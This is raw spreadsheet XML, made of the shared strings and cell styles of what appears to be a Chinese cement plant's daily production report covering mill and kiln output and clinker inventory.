        <charset val="134"/>
      </rPr>
      <t>2024年均</t>
    </r>
  </si>
  <si>
    <t>当日</t>
  </si>
  <si>
    <t>上周</t>
  </si>
  <si>
    <t>累计与2024年均差</t>
  </si>
  <si>
    <t>石灰石
破碎机台时</t>
  </si>
  <si>
    <t>海峡</t>
  </si>
  <si>
    <t>炼石</t>
  </si>
  <si>
    <t>生料磨
台时</t>
  </si>
  <si>
    <t>炼石8#</t>
  </si>
  <si>
    <t>炼石5#</t>
  </si>
  <si>
    <t>煤磨
台时</t>
  </si>
  <si>
    <t>回转窑
台产</t>
  </si>
  <si>
    <t>安砂1</t>
  </si>
  <si>
    <t>安砂2</t>
  </si>
  <si>
    <t>炼石1</t>
  </si>
  <si>
    <t>炼石2</t>
  </si>
  <si>
    <t>原煤耗</t>
  </si>
  <si>
    <t>吨熟料
发电</t>
  </si>
  <si>
    <t>氨水单耗</t>
  </si>
  <si>
    <t>水泥磨
台时</t>
  </si>
  <si>
    <t>永安A</t>
  </si>
  <si>
    <t>永安D1</t>
  </si>
  <si>
    <t>永安D2</t>
  </si>
  <si>
    <t>安砂3</t>
  </si>
  <si>
    <t>安砂4</t>
  </si>
  <si>
    <t>安砂德化2</t>
  </si>
  <si>
    <t>s</t>
  </si>
  <si>
    <t>炼石3</t>
  </si>
  <si>
    <t>福炼1</t>
  </si>
  <si>
    <t>福炼2</t>
  </si>
  <si>
    <t>本月</t>
  </si>
  <si>
    <t>调整表</t>
  </si>
  <si>
    <t>熟料库存</t>
  </si>
  <si>
    <t>M22</t>
  </si>
  <si>
    <t>M32</t>
  </si>
  <si>
    <t>M42</t>
  </si>
  <si>
    <t>M52</t>
  </si>
  <si>
    <t>M62</t>
  </si>
  <si>
    <t>M69</t>
  </si>
  <si>
    <t>M12</t>
  </si>
  <si>
    <t>M79</t>
  </si>
  <si>
    <t>M80</t>
  </si>
  <si>
    <t>水泥料库存</t>
  </si>
  <si>
    <t>M21</t>
  </si>
  <si>
    <t>M31</t>
  </si>
  <si>
    <t>M41</t>
  </si>
  <si>
    <t>M51</t>
  </si>
  <si>
    <t>M61</t>
  </si>
  <si>
    <t>M68</t>
  </si>
  <si>
    <t>M5</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</si>
</sst>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_ "/>
    <numFmt numFmtId="178" formatCode="0.0"/>
    <numFmt numFmtId="179" formatCode="0_ "/>
    <numFmt numFmtId="180" formatCode="0.0;_䄀"/>
    <numFmt numFmtId="181" formatCode="0_);[Red]\(0\)"/>
    <numFmt numFmtId="182" formatCode="0.00_);\(0.00\)"/>
    <numFmt numFmtId="183" formatCode="0.00_);[Red]\(0.00\)"/>
    <numFmt numFmtId="184" formatCode="0.0000_);[Red]\(0.0000\)"/>
    <numFmt numFmtId="185" formatCode="h:mm;@"/>
    <numFmt numFmtId="186" formatCode="0.0000"/>
    <numFmt numFmtId="187" formatCode="[h]:mm"/>
  </numFmts>
  <fonts count="47">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>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2"/>
      <name val="楷体_GB2312"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="47">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5" tint="0.799890133365886"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="6" tint="0.799890133365886"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.799890133365886"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.799890133365886"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.799890133365886"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.799890133365886"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8"/>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0">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diagonal/>
    </border>
    <border>
      <left style="medium">
        <color auto="1"/>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bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color auto="1"/>
      </left>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0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>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17" borderId="52"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53" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="53" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="54" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="18" borderId="55" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="19" borderId="56" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="19" borderId="55" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="20" borderId="57" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="58" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="59" applyNumberFormat="0" applyFill="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xf numFmtId="0" fontId="37" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38"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8" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="39" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="414">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="4" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="3" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="1" fontId="3" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="2" fontId="3" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="6"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xf>
    <xf numFmtId="177" fontId="0" fillId="7" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="8" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="8" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="6" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="9" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="9" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="6" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="10" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="10" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="4" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="11" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="11" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="12" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="2" fontId="7" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="1" fontId="7" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="1" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="55">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="0" xfId="55" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="6" borderId="0" xfId="55" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="2" xfId="55" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="10" fillId="12" borderId="2" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="12" borderId="2" xfId="55" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="0" xfId="55" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="55" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="12" borderId="0" xfId="55" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="13" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="14" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="8" borderId="15" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="8" borderId="16" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="15" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="16" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="17" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="15" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="16" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="9" borderId="18" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="9" borderId="11" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="9" borderId="19" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="20" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="21" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="8" borderId="2" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="2" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="2" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="9" borderId="2" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="9" borderId="5" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="9" borderId="22" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="23" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="10" fillId="8" borderId="2" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="10" fillId="8" borderId="3" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="10" fillId="8" borderId="3" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="10" fillId="13" borderId="3" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="10" fillId="13" borderId="3" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="10" fillId="6" borderId="3" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="10" fillId="9" borderId="2" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="10" fillId="9" borderId="3" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="10" fillId="9" borderId="2" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="10" fillId="9" borderId="24" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="55" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="25" xfId="55" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="10" fillId="13" borderId="4" xfId="55" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
